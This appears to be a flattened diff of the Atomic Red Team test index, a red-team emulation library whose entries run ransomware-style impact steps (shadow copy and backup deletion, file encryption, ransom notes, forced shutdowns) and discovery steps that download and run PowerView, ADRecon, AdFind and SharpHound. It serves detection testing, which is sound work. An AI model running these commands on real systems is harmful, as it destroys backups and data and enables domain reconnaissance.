cleanup_command: 'rm #{encrypted_file_path} -' + ' - name: Encrypt files using 7z (Linux) auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad description: 'Uses 7z to encrypt a file -' + ' supported_platforms: - linux input_arguments: @@ -51173,10 +51173,10 @@ impact: dependencies: - description: 'Finds where 7z is located -' + ' prereq_command: 'which_7z=`which 7z` -' + ' get_prereq_command: '' executor: name: bash @@ -51191,7 +51191,7 @@ impact: an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user''s home directory. -' + ' supported_platforms: - linux input_arguments: @@ -51218,7 +51218,7 @@ impact: - description: 'Finds where ccencrypt and ccdecrypt is located and copies input file -' + ' prereq_command: | which_ccencrypt=`which ccencrypt` which_ccdecrypt=`which ccdecrypt` 
@@ -51233,14 +51233,14 @@ impact: #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi -' + ' cleanup_command: "if [[ $USER == \"root\" ]]; then mv #{cped_file_path} #{root_input_file_path}; else cp #{cped_file_path} #{user_input_file_path}; fi \n" - name: Encrypt files using openssl (Linux) auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1 description: 'Uses openssl to encrypt a file -' + ' supported_platforms: - linux input_arguments: @@ -51268,10 +51268,10 @@ impact: dependencies: - description: 'Finds where openssl is located -' + ' prereq_command: 'which_openssl=`which openssl` -' + ' get_prereq_command: '' executor: name: bash @@ -51294,10 +51294,10 @@ impact: elevation_required: true command: 'echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt -' + ' cleanup_command: 'del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1 -' + ' T1565: technique: external_references: @@ -51948,18 +51948,18 @@ impact: - description: 'Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8. -' + ' prereq_command: 'if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'vssadmin.exe create shadow /for=c: -' + ' executor: command: 'vssadmin.exe delete shadows /all /quiet -' + ' name: command_prompt elevation_required: true - name: Windows - Delete Volume Shadow Copies via WMI @@ -51972,7 +51972,7 @@ impact: executor: command: 'wmic.exe shadowcopy delete -' + ' name: command_prompt elevation_required: true - name: Windows - wbadmin Delete Windows Backup Catalog @@ -51985,7 +51985,7 @@ impact: executor: command: 'wbadmin delete catalog -quiet -' + ' name: command_prompt elevation_required: true - name: Windows - Disable Windows Recovery Console Repair 
@@ -52016,7 +52016,7 @@ impact: executor: command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} -' + ' name: powershell elevation_required: true - name: Windows - Delete Backup Files @@ -52030,7 +52030,7 @@ impact: command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk -' + ' name: command_prompt elevation_required: true - name: Windows - wbadmin Delete systemstatebackup @@ -52039,13 +52039,13 @@ impact: technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled. -' + ' supported_platforms: - windows executor: command: 'wbadmin delete systemstatebackup -keepVersions:0 -' + ' name: command_prompt elevation_required: true - name: Windows - Disable the SR scheduled task @@ -52053,17 +52053,17 @@ impact: description: 'Use schtasks.exe to disable the System Restore (SR) scheduled task -' + ' supported_platforms: - windows executor: command: 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable -' + ' cleanup_command: 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1491.001: @@ -52125,7 +52125,7 @@ impact: auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3 description: 'Downloads an image from a URL and sets it as the desktop wallpaper. -' + ' supported_platforms: - windows input_arguments: @@ -52492,7 +52492,7 @@ impact: executor: command: 'yes > /dev/null -' + ' name: bash T1565.003: technique: @@ -52710,10 +52710,10 @@ impact: executor: command: 'sc.exe stop #{service_name} -' + ' cleanup_command: 'sc.exe start #{service_name} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Windows - Stop service using net.exe 
@@ -52732,10 +52732,10 @@ impact: executor: command: 'net.exe stop #{service_name} -' + ' cleanup_command: 'net.exe start #{service_name} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Windows - Stop service by killing process @@ -52755,7 +52755,7 @@ impact: executor: command: 'taskkill.exe /f /im #{process_name} -' + ' name: command_prompt T1565.001: technique: @@ -52866,7 +52866,7 @@ impact: auto_generated_guid: ad254fa8-45c0-403b-8c77-e00b3d3e7a64 description: 'This test shuts down a Windows system. -' + ' supported_platforms: - windows input_arguments: @@ -52877,14 +52877,14 @@ impact: executor: command: 'shutdown /s /t #{timeout} -' + ' name: command_prompt elevation_required: true - name: Restart System - Windows auto_generated_guid: f4648f0d-bf78-483c-bafc-3ec99cd1c302 description: 'This test restarts a Windows system. -' + ' supported_platforms: - windows input_arguments: @@ -52895,14 +52895,14 @@ impact: executor: command: 'shutdown /r /t #{timeout} -' + ' name: command_prompt elevation_required: true - name: Restart System via `shutdown` - macOS/Linux auto_generated_guid: 6326dbc4-444b-4c04-88f4-27e94d0327cb description: 'This test restarts a macOS/Linux system. -' + ' supported_platforms: - macos - linux @@ -52914,14 +52914,14 @@ impact: executor: command: 'shutdown -r #{timeout} -' + ' name: bash elevation_required: true - name: Shutdown System via `shutdown` - macOS/Linux auto_generated_guid: 4963a81e-a3ad-4f02-adda-812343b351de description: 'This test shuts down a macOS/Linux system using a halt. -' + ' supported_platforms: - macos - linux 
@@ -52933,73 +52933,73 @@ impact: executor: command: 'shutdown -h #{timeout} -' + ' name: bash elevation_required: true - name: Restart System via `reboot` - macOS/Linux auto_generated_guid: 47d0b042-a918-40ab-8cf9-150ffe919027 description: 'This test restarts a macOS/Linux system via `reboot`. -' + ' supported_platforms: - macos - linux executor: command: 'reboot -' + ' name: bash elevation_required: true - name: Shutdown System via `halt` - Linux auto_generated_guid: 918f70ab-e1ef-49ff-bc57-b27021df84dd description: 'This test shuts down a Linux system using `halt`. -' + ' supported_platforms: - linux executor: command: 'halt -p -' + ' name: bash elevation_required: true - name: Reboot System via `halt` - Linux auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e description: 'This test restarts a Linux system using `halt`. -' + ' supported_platforms: - linux executor: command: 'halt --reboot -' + ' name: bash elevation_required: true - name: Shutdown System via `poweroff` - Linux auto_generated_guid: 73a90cd2-48a2-4ac5-8594-2af35fa909fa description: 'This test shuts down a Linux system using `poweroff`. -' + ' supported_platforms: - linux executor: command: 'poweroff -' + ' name: bash elevation_required: true - name: Reboot System via `poweroff` - Linux auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41 description: 'This test restarts a Linux system using `poweroff`. -' + ' supported_platforms: - linux executor: command: 'poweroff --reboot -' + ' name: bash elevation_required: true T1565.002: 
@@ -53170,10 +53170,10 @@ discovery: dependencies: - description: 'T1010.cs must exist on disk at specified location (#{input_source_code}) -' + ' prereq_command: 'if (Test-Path #{input_source_code}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}" @@ -53183,7 +53183,7 @@ discovery: #{output_file_name} cleanup_command: 'del /f /q /s #{output_file_name} >nul 2>&1 -' + ' name: command_prompt T1217: technique: @@ -53233,7 +53233,7 @@ discovery: description: 'Searches for Mozilla Firefox''s places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file. -' + ' supported_platforms: - linux input_arguments: @@ -53247,14 +53247,14 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null -' + ' name: sh - name: List Mozilla Firefox Bookmark Database Files on macOS auto_generated_guid: 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b description: 'Searches for Mozilla Firefox''s places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file. -' + ' supported_platforms: - macos input_arguments: @@ -53268,14 +53268,14 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null -' + ' name: sh - name: List Google Chrome Bookmark JSON Files on macOS auto_generated_guid: b789d341-154b-4a42-a071-9111588be9bc description: 'Searches for Google Chrome''s Bookmark file (on macOS) that contains bookmarks in JSON format and lists any found instances to a text file. -' + ' supported_platforms: - macos input_arguments: 
@@ -53289,7 +53289,7 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null -' + ' name: sh - name: List Google Chrome / Opera Bookmarks on Windows with powershell auto_generated_guid: faab755e-4299-48ec-8202-fc7885eb6545 @@ -53302,7 +53302,7 @@ discovery: command: 'Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyContinue -Force -' + ' name: powershell - name: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt auto_generated_guid: 76f71e2f-480e-4bed-b61e-398fe17499d5 @@ -53314,7 +53314,7 @@ discovery: executor: command: 'where /R C:\Users\ Bookmarks -' + ' name: command_prompt - name: List Mozilla Firefox bookmarks on Windows with command prompt auto_generated_guid: 4312cdbc-79fc-4a9c-becc-53d49c734bc5 @@ -53326,7 +53326,7 @@ discovery: executor: command: 'where /R C:\Users\ places.sqlite -' + ' name: command_prompt - name: List Internet Explorer Bookmarks using the command prompt auto_generated_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 @@ -53337,7 +53337,7 @@ discovery: executor: command: 'dir /s /b %USERPROFILE%\Favorites -' + ' name: command_prompt T1087.004: technique: @@ -53784,7 +53784,7 @@ discovery: description: 'Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. -' + ' supported_platforms: - windows executor: @@ -53798,7 +53798,7 @@ discovery: description: 'Enumerate logged on users. Upon exeuction, logged on users will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -53809,7 +53809,7 @@ discovery: executor: command: 'query user /SERVER:#{computer_name} -' + ' name: command_prompt - name: Automated AD Recon (ADRecon) auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59 
@@ -53827,18 +53827,18 @@ discovery: dependencies: - description: 'ADRecon must exist on disk at specified location (#{adrecon_path}) -' + ' prereq_command: 'if (Test-Path #{adrecon_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile #{adrecon_path} -' + ' executor: command: 'Invoke-Expression #{adrecon_path} -' + ' cleanup_command: | Remove-Item #{adrecon_path} -Force -ErrorAction Ignore | Out-Null Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse @@ -53859,14 +53859,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength @@ -53888,14 +53888,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -sc admincountdmp\n" name: command_prompt 
@@ -53915,14 +53915,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -f (objectcategory=person)\n" name: command_prompt @@ -53942,14 +53942,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -sc exchaddresses\n" name: command_prompt @@ -53958,13 +53958,13 @@ discovery: description: 'This test will enumerate the details of the built-in domain admin account -' + ' supported_platforms: - windows executor: command: 'net user administrator /domain -' + ' name: command_prompt - name: Enumerate Active Directory for Unconstrained Delegation auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b @@ -53987,7 +53987,7 @@ discovery: dependencies: - description: 'PowerShell ActiveDirectory Module must be installed -' + ' prereq_command: | Try { Import-Module ActiveDirectory -ErrorAction Stop | Out-Null @@ -54008,7 +54008,7 @@ discovery: command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})'' -Server #{domain} -' + ' T1069.002: technique: external_references: @@ -54076,7 +54076,7 @@ discovery: executor: command: 'get-ADPrincipalGroupMembership #{user} | select name -' + ' name: powershell - name: Elevated group enumeration using net group (Domain) auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37 
@@ -54098,7 +54098,7 @@ discovery: execution, progress and info about each host in the domain being scanned will be displayed. -' + ' supported_platforms: - windows executor: @@ -54112,7 +54112,7 @@ discovery: machines in the domain. Upon execution, information about each machine will be displayed. -' + ' supported_platforms: - windows executor: @@ -54125,7 +54125,7 @@ discovery: description: 'takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -54143,39 +54143,39 @@ discovery: description: 'When successful, accounts that do not require kerberos pre-auth will be returned -' + ' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined. -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually. -' + ' - description: 'Requires the Active Directory module for powershell to be installed. -' + ' prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" -' + ' executor: name: powershell elevation_required: false command: 'get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE} -' + ' - name: Adfind - Query Active Directory Groups auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274 description: | 
@@ -54192,10 +54192,10 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} @@ -54285,7 +54285,7 @@ discovery: executor: command: 'dsquery * -filter "(objectClass=trustedDomain)" -attr * -' + ' name: command_prompt - name: Windows - Discover domain trusts with nltest auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe @@ -54298,17 +54298,17 @@ discovery: dependencies: - description: 'nltest.exe from RSAT must be present on disk -' + ' prereq_command: 'WHERE nltest.exe >NUL 2>&1 -' + ' get_prereq_command: 'echo Sorry RSAT must be installed manually -' + ' executor: command: 'nltest /domain_trusts -' + ' name: command_prompt - name: Powershell enumerate domains and forests auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30 @@ -54321,26 +54321,26 @@ discovery: dependencies: - description: 'PowerView PowerShell script must exist on disk -' + ' prereq_command: 'if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1" -' + ' - description: 'RSAT PowerShell AD admin cmdlets must be installed -' + ' prereq_command: 'if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'Write-Host "Sorry RSAT must be installed manually" -' + ' executor: command: | Import-Module "$env:TEMP\PowerView.ps1" 
@@ -54365,14 +54365,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n" name: command_prompt @@ -54392,14 +54392,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -gcb -sc trustdmp\n" name: command_prompt @@ -54409,7 +54409,7 @@ discovery: Upon execution, progress and info about trusts within the domain being scanned will be displayed. -' + ' supported_platforms: - windows executor: @@ -54423,7 +54423,7 @@ discovery: Upon execution, progress and info about forest trusts within the domain being scanned will be displayed. -' + ' supported_platforms: - windows executor: @@ -54561,7 +54561,7 @@ discovery: description: 'Find or discover files on the file system. Upon execution, file and folder information will be displayed. -' + ' supported_platforms: - windows executor: @@ -54600,13 +54600,13 @@ discovery: which sh cleanup_command: 'rm #{output_file} -' + ' name: sh - name: Nix File and Directory Discovery 2 auto_generated_guid: 13c5e1ae-605b-46c4-a79f-db28c77ff24e description: 'Find or discover files on the file system -' + ' supported_platforms: - macos - linux 
@@ -54712,7 +54712,7 @@ discovery: auto_generated_guid: f8aab3dd-5990-4bf8-b8ab-2226c951696f description: 'Enumerate all accounts by copying /etc/passwd to another file -' + ' supported_platforms: - linux input_arguments: @@ -54726,7 +54726,7 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: sh - name: View sudoers access auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2 @@ -54745,14 +54745,14 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: sh elevation_required: true - name: View accounts with UID 0 auto_generated_guid: c955a599-3653-4fe5-b631-f11c00eb0397 description: 'View accounts with UID 0 -' + ' supported_platforms: - linux - macos @@ -54767,26 +54767,26 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null -' + ' name: sh - name: List opened files by user auto_generated_guid: 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb description: 'List opened files by user -' + ' supported_platforms: - linux - macos executor: command: 'username=$(id -u -n) && lsof -u $username -' + ' name: sh - name: Show if a user account has ever logged in remotely auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110 description: 'Show if a user account has ever logged in remotely -' + ' supported_platforms: - linux input_arguments: @@ -54798,27 +54798,27 @@ discovery: dependencies: - description: 'Check if lastlog command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; fi -' + ' get_prereq_command: 'sudo apt-get install login; exit 1; -' + ' executor: command: | lastlog > #{output_file} cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: sh - name: Enumerate users and groups auto_generated_guid: e6f36545-dc1e-47f0-9f48-7f730f54a02e description: 'Utilize groups and id to enumerate users and groups -' + ' supported_platforms: - linux - macos 
@@ -54831,7 +54831,7 @@ discovery: auto_generated_guid: 319e9f6c-7a9e-432e-8c62-9385c803b6f2 description: 'Utilize local utilities to enumerate users and groups -' + ' supported_platforms: - macos executor: @@ -54862,7 +54862,7 @@ discovery: description: 'Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. -' + ' supported_platforms: - windows executor: @@ -54882,13 +54882,13 @@ discovery: description: 'Enumerate logged on users. Upon execution, logged on users will be displayed. -' + ' supported_platforms: - windows executor: command: 'query user -' + ' name: command_prompt T1069.001: technique: @@ -54932,7 +54932,7 @@ discovery: auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae description: 'Permission Groups Discovery -' + ' supported_platforms: - macos - linux @@ -54974,7 +54974,7 @@ discovery: description: 'This module runs the Windows executable of SharpHound in order to remotely list members of the local Administrators group (SAMR) -' + ' supported_platforms: - windows input_arguments: @@ -54998,11 +54998,11 @@ discovery: prereq_command: 'if (Test-Path "#{sharphound_path}") { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'Invoke-WebRequest "https://github.com/BloodHoundAD/BloodHound/blob/e062fe73d73c015dccb37fae5089342d009b84b8/Collectors/SharpHound.exe?raw=true" -OutFile "#{sharphound_path}" -' + ' executor: name: powershell elevation_required: false 
@@ -55011,19 +55011,19 @@ discovery: & "#{sharphound_path}" -d "#{domain}" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory "#{output_path}" cleanup_command: 'Remove-Item -Recurse #{output_path} -ErrorAction Ignore -' + ' - name: Wmic Group Discovery auto_generated_guid: 7413be50-be8e-430f-ad4d-07bf197884b2 description: 'Utilizing wmic.exe to enumerate groups on the local system. Upon execution, information will be displayed of local groups on system. -' + ' supported_platforms: - windows executor: command: 'wmic.exe group get name -' + ' name: powershell - name: WMIObject Group Discovery auto_generated_guid: 69119e58-96db-4110-ad27-954e48f3bb13 @@ -55031,13 +55031,13 @@ discovery: groups on the endpoint. Upon execution, Upon execution, information will be displayed of local groups on system. -' + ' supported_platforms: - windows executor: command: 'Get-WMIObject Win32_Group -' + ' name: powershell T1046: technique: @@ -55133,11 +55133,11 @@ discovery: dependencies: - description: 'Check if nmap command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)\n" executor: @@ -55164,7 +55164,7 @@ discovery: dependencies: - description: 'NMap must be installed -' + ' prereq_command: if (cmd /c "nmap 2>nul") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url} @@ -55177,7 +55177,7 @@ discovery: auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c description: 'Scan ports to check for listening ports with python -' + ' supported_platforms: - windows input_arguments: 
@@ -55193,17 +55193,17 @@ discovery: dependencies: - description: 'Check if python exists on the machine -' + ' prereq_command: 'if (python --version) {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' executor: command: 'python #(unknown) -i #{host_ip} -' + ' name: powershell T1135: technique: @@ -55267,7 +55267,7 @@ discovery: auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7 description: 'Network Share Discovery -' + ' supported_platforms: - macos input_arguments: @@ -55285,7 +55285,7 @@ discovery: auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae description: 'Network Share Discovery using smbstatus -' + ' supported_platforms: - linux input_arguments: @@ -55302,16 +55302,16 @@ discovery: dependencies: - description: 'Package with smbstatus (samba) must exist on device -' + ' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi -' + ' get_prereq_command: "sudo #{package_installer} \n" executor: command: 'smbstatus --shares -' + ' name: bash elevation_required: true - name: Network Share Discovery command prompt @@ -55329,7 +55329,7 @@ discovery: executor: command: 'net view \\#{computer_name} -' + ' name: command_prompt - name: Network Share Discovery PowerShell auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb @@ -55341,7 +55341,7 @@ discovery: executor: command: 'get-smbshare -' + ' name: powershell - name: View available share drives auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae 
@@ -55353,28 +55353,28 @@ discovery: executor: command: 'net share -' + ' name: command_prompt - name: Share Discovery with PowerView auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd description: 'Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. -' + ' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Endpoint must be joined to domain -' + ' prereq_command: 'if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: '"Join system to domain" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -55399,7 +55399,7 @@ discovery: get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1" -OutFile $env:TEMP\PowerView.ps1 -' + ' executor: command: | Import-Module $env:TEMP\PowerView.ps1 @@ -55476,11 +55476,11 @@ discovery: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -55506,11 +55506,11 @@ discovery: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: 
@@ -55553,14 +55553,14 @@ discovery: - description: 'tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". -' + ' prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} Start-Process $env:temp\wireshark_installer.exe /S - description: 'npcap must be installed. -' + ' prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} @@ -55568,7 +55568,7 @@ discovery: executor: command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 -' + ' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture 
@@ -55641,57 +55641,57 @@ discovery: auto_generated_guid: '085fe567-ac84-47c7-ac4c-2688ce28265b' description: 'Lists the password complexity policy to console on Ubuntu Linux. -' + ' supported_platforms: - linux executor: command: 'cat /etc/pam.d/common-password -' + ' name: bash - name: Examine password complexity policy - CentOS/RHEL 7.x auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d description: 'Lists the password complexity policy to console on CentOS/RHEL 7.x Linux. -' + ' supported_platforms: - linux dependencies: - description: 'System must be CentOS or RHEL v7 -' + ' prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "7" ]; then exit /b 0; else exit /b 1; fi; -' + ' get_prereq_command: 'echo Please run from CentOS or RHEL v7 -' + ' executor: command: 'cat /etc/security/pwquality.conf -' + ' name: bash - name: Examine password complexity policy - CentOS/RHEL 6.x auto_generated_guid: 6ce12552-0adb-4f56-89ff-95ce268f6358 description: 'Lists the password complexity policy to console on CentOS/RHEL 6.x Linux. -' + ' supported_platforms: - linux dependencies: - description: 'System must be CentOS or RHEL v6 -' + ' prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "6" ]; then exit /b 0; else exit /b 1; fi; -' + ' get_prereq_command: 'echo Please run from CentOS or RHEL v6 -' + ' executor: command: | cat /etc/pam.d/system-auth 
@@ -55701,43 +55701,43 @@ discovery: auto_generated_guid: 7c86c55c-70fa-4a05-83c9-3aa19b145d1a description: 'Lists the password expiration policy to console on CentOS/RHEL/Ubuntu. -' + ' supported_platforms: - linux executor: command: 'cat /etc/login.defs -' + ' name: bash - name: Examine local password policy - Windows auto_generated_guid: 4588d243-f24e-4549-b2e3-e627acc089f6 description: 'Lists the local password policy to console on Windows. -' + ' supported_platforms: - windows executor: command: 'net accounts -' + ' name: command_prompt - name: Examine domain password policy - Windows auto_generated_guid: 46c2c362-2679-4ef5-aec9-0e958e135be4 description: 'Lists the domain password policy to console on Windows. -' + ' supported_platforms: - windows executor: command: 'net accounts /domain -' + ' name: command_prompt - name: Examine password policy - macOS auto_generated_guid: 4b7fa042-9482-45e1-b348-4b756b2a0742 description: 'Lists the password policy to console on macOS. -' + ' supported_platforms: - macos executor: @@ -55916,7 +55916,7 @@ discovery: ps aux >> #{output_file} cleanup_command: 'rm #{output_file} -' + ' name: sh - name: Process Discovery - tasklist auto_generated_guid: c5806a4f-62b8-4900-980b-c7ec004e9908 @@ -55928,7 +55928,7 @@ discovery: executor: command: 